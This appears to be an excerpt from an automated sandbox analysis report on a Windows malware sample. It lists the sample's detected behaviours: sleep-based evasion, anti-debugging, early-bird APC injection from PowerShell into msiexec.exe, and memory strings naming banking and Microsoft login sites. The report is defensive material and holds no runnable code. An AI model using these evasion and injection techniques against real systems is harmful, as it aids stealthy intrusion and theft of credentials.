Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599282	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599172	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598454	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598329	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598204	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598079	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597954	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597829	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597704	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597579	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597454	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597329	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597204	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597079	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596954	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596829	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596704	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596579	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596454	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596329	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596204	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596079	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595930	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595822	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595467	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595079	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593235	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6321			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3312			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1240	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -28592453314249787s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7472	Thread sleep count: 8163 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7472	Thread sleep count: 1638 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -599532s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -599407s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -599282s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -599172s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -598938s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -598813s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -598688s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -598563s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -598454s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -598329s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -598204s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -598079s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -597954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -597829s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -597704s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -597579s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -597454s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -597329s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -597204s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -597079s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -596954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -596829s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -596704s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -596579s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -596454s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -596329s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -596204s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -596079s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -595930s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -595822s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -595610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -595467s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -595250s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -595079s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -594969s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -594844s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -594735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -594610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -594485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -594360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -594110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -593985s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -593860s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -593735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -593610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -593485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -593360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7468	Thread sleep time: -593235s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\87h216Snb7.exe	Code function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C4D
Source: C:\Users\user\Desktop\87h216Snb7.exe	Code function: 0_2_00402930 FindFirstFileW,	0_2_00402930
Source: C:\Users\user\Desktop\87h216Snb7.exe	Code function: 0_2_0040689E FindFirstFileW,FindClose,	0_2_0040689E

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599282	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599172	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598454	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598329	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598204	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598079	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597954	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597829	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597704	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597579	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597454	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597329	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597204	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597079	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596954	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596829	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596704	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596579	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596454	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596329	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596204	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596079	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595930	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595822	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595467	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595079	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593235	Jump to behavior

Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: ModuleAnalysisCache.7.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: msiexec.exe, 0000000B.00000002.2517147937.0000000004F9A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2517147937.0000000004FFC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 87h216Snb7.exe, 00000000.00000002.1332402123.0000000000508000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Z0*Y
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: ModuleAnalysisCache.7.dr	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: powershell.exe, 00000007.00000002.1531343909.0000000005095000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter@\
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: ModuleAnalysisCache.7.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000007.00000002.1531343909.0000000005095000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter@\
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: powershell.exe, 00000007.00000002.1531343909.0000000005095000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter@\
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\87h216Snb7.exe	API call chain: ExitProcess graph end node			graph_0-3912
Source: C:\Users\user\Desktop\87h216Snb7.exe	API call chain: ExitProcess graph end node			graph_0-3915

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Windows\SysWOW64\msiexec.exe

Thread information set: HideFromDebugger

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 7_2_0062F538 LdrInitializeThunk,LdrInitializeThunk,

7_2_0062F538

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 42D0000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
